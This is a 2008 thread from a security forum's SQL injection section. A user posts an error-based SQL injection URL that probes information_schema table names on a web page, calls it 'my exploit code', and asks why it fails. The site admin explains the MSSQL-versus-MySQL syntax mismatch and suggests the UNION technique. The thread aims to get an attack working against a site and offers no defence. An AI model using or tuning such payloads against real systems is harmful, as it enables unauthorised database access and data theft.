 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| |
|
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9145
 People Online:
 Visitors: 613
 Members: 0
 Total: 613
|
|
|
|
|
|
PacketStorm News |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
sql injection help? |
|
 Posted: Sun Aug 31, 2008 12:07 pm |
 |
|
| jonhmatter |
| Beginner |
 |
| |
| Joined: Aug 31, 2008 |
| Posts: 1 |
|
|
|
 |
|
 |
|
i have a problem in this request SQL . . look on the URL link
| Code: | | pie.cfm?id=1%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))--sp_password |
and has error:
Error Executing Database Query.
Syntax error or access violation: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,(select top 1 table_name from information_schema.tables))--
Help me?what error in my exploit code?
Can you help me?
Thank you |
|
|
|
|
| Posted: Sun Aug 31, 2008 1:12 pm |
|
|
| waraxe |
| Site admin |
 |
| |
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
CONVERT function is present both in mysql and mssql database implementations, but they have different syntax. And you are trying to use mssql syntax in mysql database 
By the way, have you already tried UNION method for fetching needed data? |
|
|
|
|
| Posted: Mon Sep 08, 2008 8:26 am |
|
|
| Byapti |
| Beginner |
|
| |
| Joined: Aug 19, 2008 |
| Posts: 2 |
|
|
|
|
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
